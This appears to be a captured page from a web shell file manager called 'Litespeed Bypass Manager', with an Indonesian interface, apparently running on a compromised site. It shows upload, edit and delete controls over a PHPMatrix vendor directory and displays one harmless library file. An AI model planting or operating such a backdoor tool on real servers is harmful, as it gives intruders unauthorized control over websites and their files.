Litespeed Bypass Manager
Direktori:
/admin/vendor/markbaker/matrix/classes/src/functions
⬆️ Kembali
Buat Folder Baru
Buat Folder
Upload File
Upload
⚠️ Litespeed Uploader
Isi Folder
📄 adjoint.php
Edit
Hapus
📄 antidiagonal.php
Edit
Hapus
📄 cofactors.php
Edit
Hapus
📄 determinant.php
Edit
Hapus
📄 diagonal.php
Edit
Hapus
📄 identity.php
Edit
Hapus
📄 inverse.php
Edit
Hapus
📄 minors.php
Edit
Hapus
📄 trace.php
Edit
Hapus
📄 transpose.php
Edit
Hapus
Edit File: antidiagonal.php
<?php /** * * Function code for the matrix antidiagonal() function * * @copyright Copyright (c) 2018 Mark Baker (https://github.com/MarkBaker/PHPMatrix) * @license https://opensource.org/licenses/MIT MIT */ namespace Matrix; /** * Returns the antidiagonal of a matrix or an array. * * @param Matrix|array $matrix Matrix or an array to treat as a matrix. * @return Matrix The new matrix * @throws Exception If argument isn't a valid matrix or array. */ function antidiagonal($matrix) { if (!is_object($matrix) || !($matrix instanceof Matrix)) { $matrix = new Matrix($matrix); } return Functions::antidiagonal($matrix); }
Simpan
Catatan: Mengedit file biner tidak disarankan.